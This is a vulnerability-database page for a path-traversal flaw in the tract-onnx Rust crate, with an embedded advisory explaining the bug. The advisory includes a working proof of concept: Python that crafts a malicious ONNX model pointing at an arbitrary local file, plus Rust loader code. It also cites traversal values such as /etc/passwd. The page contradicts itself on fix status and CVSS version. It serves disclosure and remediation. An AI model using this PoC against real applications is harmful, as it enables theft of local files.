CVE-2026-55832

MEDIUMPre-NVD 6.16.1
EchelonGraph scoreLOW confidence

This medium-severity CVE scores 6.1 under the CNA's CVSS (NVD's own analysis pending). EPSS exploit-prediction score not yet available (the EPSS model rescores nightly; freshly-published CVEs typically appear within 48 hours). GitHub Security Advisory data not yet ingested — confidence will rise once GHSA publishes (typical lag: hours to days for open-source ecosystem CVEs; never for infrastructure-only CVEs).

Triggered by: NVD CVSS baseline
Sources: cna:github_m
6.1
EchelonGraph verdictMonitorLow exploitation likelihood right now — keep watching.
  • Lower severity and no public exploit yet
CISA-KEV: Not listedEPSS: CVSS: 6.1Exploit: NoneExposed: 0

No vendor fix yet — apply a workaround or compensating control (WAF / firewall / segmentation) and watch for a patch.

tract: Arbitrary file read via unsanitized ONNX external_data location (path traversal) on model load in tract-onnx

Summary

tract (the tract-onnx crate) resolves an ONNX tensor's external-data location by joining it onto the model directory without any sanitization. Because location comes from the (untrusted) .onnx file, a malicious model can make tract open and read an arbitrary local file at load time, with the file's contents flowing into the model's tensors / inference output (read-only file disclosure). This is the ONNX external-data path-traversal class that the reference onnx library hardened over several CVEs; tract resolves location itself and was never hardened.

Details

In onnx/src/tensor.rs, get_external_resources() builds the path with no checks:

let location = /* tensor.external_data "location" value — attacker-controlled */;
let p = PathBuf::from(path).join(location);          // no is_absolute / ".." / canonicalize / containment check
provider.read_bytes_from_path(&mut tensor_data, &p, offset, length)?;   // Mmap::map(File::open(p)) by default
  • Path::join with an absolute location (e.g. /etc/passwd) discards the base directory → p = /etc/passwd.
  • A relative ../../../../etc/passwd value is not normalized → directory traversal.
  • The default MmapDataResolver (onnx/src/data_resolver.rs) then mmaps the file and copies mmap[offset..offset+length] into the tensor. offset/length are also taken from the file; an out-of-range slice panics (DoS).

No is_absolute, .., canonicalize, or containment check exists anywhere on this path (tensor.rs, model.rs, data_resolver.rs).

Reachable from the standard public API: model_for_path(p) (onnx/src/model.rs) sets model_dir = p.parent() and calls load_tensor(proto, model_dir)get_external_resources(.., model_dir).

PoC

Tested on tract-onnx 0.21.16 (crates.io), Rust 1.96.

  • A canary file the model must not be able to read:
/tmp/tract_canary_secret.txtTRACT-EXTDATA-TRAVERSAL-CANARY-7f3a2b
  • Build a small evil.onnx with a UINT8[37] initializer whose external_data is location=/tmp/tract_canary_secret.txt (absolute), offset=0, length=37, fed through Identity to the output (raw protobuf serialization):

import onnx
from onnx import helper, TensorProto, StringStringEntryProto
N = 37; LOC = "/tmp/tract_canary_secret.txt"      # absolute -> Path::join discards the base dir
w = TensorProto(); w.name = "W"; w.data_type = TensorProto.UINT8
w.dims.extend([N]); w.data_location = TensorProto.EXTERNAL
for k, v in [("location", LOC), ("offset", "0"), ("length", str(N))]:
    e = StringStringEntryProto(); e.key = k; e.value = v; w.external_data.append(e)
node = helper.make_node("Identity", ["W"], ["Y"])
out = helper.make_tensor_value_info("Y", TensorProto.UINT8, [N])
g = helper.make_graph([node], "g", [], [out], initializer=[w])
m = helper.make_model(g, opset_imports=[helper.make_opsetid("", 13)])
open("evil.onnx", "wb").write(m.SerializeToString())
  • Victim loads the untrusted model with the standard API:

let model = tract_onnx::onnx().model_for_path("evil.onnx")?;
let out = model.into_optimized()?.into_runnable()?.run(tvec!())?;
let bytes: Vec = out[0].to_array_view::()?.iter().cloned().collect();
println!("{:?}", String::from_utf8_lossy(&bytes));

Output:

"TRACT-EXTDATA-TRAVERSAL-CANARY-7f3a2b"

i.e. the contents of the arbitrary local file were read by tract and surfaced in the inference output.

Impact

Read-only arbitrary local file disclosure when an application uses tract to load an untrusted or shared ONNX model (model hubs, multi-file repos, user uploads). The file content is recoverable from the model's tensors / inference output. Secondary: denial of service (panic) via out-of-bounds offset/length. No write or code execution.

Suggested fix

Reject absolute location and any .. component, then canonicalize and verify the resolved path stays within the model directory (mirroring onnx 1.22.0's resolve_external_data_location); reject symlinks; validate offset/length against the file size before slicing.

CVSS v3
6.1
EG Score
6.1(low)
EPSS
KEV
Not listed

Published

June 19, 2026

Last Modified

June 19, 2026

Vendor Advisories for CVE-2026-55832(1)

These vendors published their own advisory mentioning this CVE — often with vendor-specific remediation steps + affected product lists not in NVD.

Affected Packages

(1 across 1 ecosystem)
crates.io(1)
PackageVulnerable rangeFixed inDependents
tract-onnx0.23.2

Data Freshness Timeline

(refreshed 7× in last 7d / 18× in last 30d)

Each row is a source pipeline that fetched or updated this CVE on that date, with what changed. For example, "NVD update" means NVD published or revised its analysis for this CVE; "MITRE cvelistV5" means we ingested or refreshed it from the CNA feed. Most recent first.

  1. 2026-07-07 02:38 UTCEG score recompute
  2. 2026-07-06 02:02 UTCEG score recompute
  3. 2026-07-05 01:26 UTCEG score recompute
  4. 2026-07-04 00:50 UTCEG score recompute
  5. 2026-07-03 00:14 UTCEG score recompute
  6. 2026-07-01 23:37 UTCEG score recompute
  7. 2026-06-30 22:59 UTCEG score recompute
  8. 2026-06-29 22:23 UTCEG score recompute
  9. 2026-06-28 21:48 UTCEG score recompute
  10. 2026-06-27 21:12 UTCEG score recompute
  11. 2026-06-26 20:36 UTCEG score recompute
  12. 2026-06-25 20:01 UTCEG score recompute
  13. 2026-06-24 19:24 UTCEG score recompute
  14. 2026-06-23 17:28 UTCEG score recompute
  15. 2026-06-22 16:53 UTCEG score recompute
  16. 2026-06-21 16:14 UTCEG score recompute
  17. 2026-06-20 15:35 UTCEG score recompute
  18. 2026-06-19 14:56 UTCEG score recompute

Frequently asked(4)

What is CVE-2026-55832?
CVE-2026-55832 is a medium vulnerability published on June 19, 2026. tract: Arbitrary file read via unsanitized ONNX external_data location (path traversal) on model load in tract-onnx Summary tract (the tract-onnx crate) resolves an ONNX tensor's external-data location by joining it onto the model directory without any sanitization. Because location comes from the…
When was CVE-2026-55832 disclosed?
CVE-2026-55832 was first published in the National Vulnerability Database on June 19, 2026. EchelonGraph re-ingests CVE updates from NVD on a 2-hour cycle, so this page reflects the latest published state.
What is the CVSS score of CVE-2026-55832?
CVE-2026-55832 has a CVSS v4.0 base score of 6.1 (CNA self-assessment; NVD's own analysis pending). The EG score is currently aggregating — additional source signals are being incorporated as they become available..
How do I remediate CVE-2026-55832?
Patch to the fixed version published by the affected vendor. Where vendor advisories exist for CVE-2026-55832, EchelonGraph cross-links them in the Vendor Advisories panel below — those typically contain the canonical remediation steps, fixed version numbers, and any vendor-specific mitigations.

Dependency Blast Radius

See which npm, PyPI, Go, and Maven packages are affected by CVE-2026-55832

Explore →

Is Your Infrastructure Affected by CVE-2026-55832?

EchelonGraph automatically scans your cloud infrastructure and maps CVE exposure using blast radius analysis.